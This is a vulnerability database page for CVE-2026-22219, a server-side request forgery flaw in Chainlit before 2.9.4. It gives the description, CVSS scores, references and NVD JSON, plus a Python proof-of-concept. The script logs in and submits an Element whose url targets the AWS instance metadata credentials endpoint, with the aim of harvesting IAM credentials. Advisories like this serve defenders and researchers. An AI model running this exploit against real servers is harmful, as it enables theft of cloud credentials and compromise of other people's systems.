CVE-2026-22219

Description

Chainlit versions prior to 2.9.4 contain a server-side request forgery (SSRF) vulnerability in the /project/element update flow when configured with the SQLAlchemy data layer backend. An authenticated client can provide a user-controlled url value in an Element, which is fetched by the SQLAlchemy element creation logic using an outbound HTTP GET request. This allows an attacker to make arbitrary HTTP requests from the Chainlit server to internal network services or cloud metadata endpoints and store the retrieved responses via the configured storage provider.

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:chainlit:chainlit:*:*:*:*:*:*:*:* - VULNERABLE

Chainlit < 2.9.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests import json # CVE-2026-22219 SSRF PoC for Chainlit # Target: Chainlit application with SQLAlchemy data layer TARGET_URL = "http://target-chainlit-server.com" LOGIN_URL = f"{TARGET_URL}/api/login" ELEMENT_API_URL = f"{TARGET_URL}/api/project/element" # Cloud metadata endpoint for AWS SSRF_TARGET = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" def exploit_ssrf(): """ Exploit SSRF vulnerability in Chainlit's Element creation flow to access cloud metadata endpoints or internal services """ session = requests.Session() # Step 1: Authenticate with valid credentials login_data = { "username": "[email protected]", "password": "password123" } try: login_response = session.post(LOGIN_URL, json=login_data, timeout=10) if login_response.status_code != 200: print(f"[-] Authentication failed: {login_response.status_code}") return False print("[+] Authentication successful") # Step 2: Create malicious Element with SSRF payload # The vulnerable endpoint fetches the URL during element creation element_data = { "name": "malicious_element", "type": "file", "url": SSRF_TARGET, # SSRF payload - cloud metadata "mime": "text/plain", "size": 1024 } response = session.post(ELEMENT_API_URL, json=element_data, timeout=30) if response.status_code == 200: print(f"[+] SSRF attack successful!") print(f"[*] Response: {response.text}") return True else: print(f"[-] Attack failed: {response.status_code}") print(f"[*] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": print("CVE-2026-22219 Chainlit SSRF PoC") print("=" * 50) exploit_ssrf()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22219
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22219
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22219/
[4] VulDB https://vuldb.com/cve/CVE-2026-22219
[5] https://github.com/Chainlit/chainlit/releases/tag/2.9.4
[6] https://www.vulncheck.com/advisories/chainlit-sqlalchemy-data-layer-ssrf-via-project-element
[7] https://www.zafran.io/resources/chainleak-critical-ai-framework-vulnerabilities-expose-data-enable-cloud-takeover

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22219", "sourceIdentifier": "[email protected]", "published": "2026-01-20T00:15:49.053", "lastModified": "2026-02-02T20:56:09.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chainlit versions prior to 2.9.4 contain a server-side request forgery (SSRF) vulnerability in the /project/element update flow when configured with the SQLAlchemy data layer backend. An authenticated client can provide a user-controlled url value in an Element, which is fetched by the SQLAlchemy element creation logic using an outbound HTTP GET request. This allows an attacker to make arbitrary HTTP requests from the Chainlit server to internal network services or cloud metadata endpoints and store the retrieved responses via the configured storage provider."}, {"lang": "es", "value": "Las versiones de Chainlit anteriores a la 2.9.4 contienen una vulnerabilidad de falsificación de petición del lado del servidor (SSRF) en el flujo de actualización de /project/element cuando se configura con el backend de la capa de datos de SQLAlchemy. Un cliente autenticado puede proporcionar un valor de URL controlado por el usuario en un Element, que es recuperado por la lógica de creación de elementos de SQLAlchemy utilizando una petición HTTP GET saliente. Esto permite a un atacante realizar peticiones HTTP arbitrarias desde el servidor de Chainlit a servicios de red internos o puntos finales de metadatos en la nube y almacenar las respuestas recuperadas a través del proveedor de almacenamiento configurado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chainlit:chainlit:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.9.4", "matchCriteriaId": "829EC540-D789-4A01-A062-B4EA52818A54"}]}]}], "references": [{"url": "https://github.com/Chainlit/chainlit/releases/tag/2.9.4", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/chainlit-sqlalchemy-data-layer-ssrf-via-project-element", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zafran.io/resources/chainleak-critical-ai-framework-vulnerabilities-expose-data-enable-cloud-takeover", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}]}}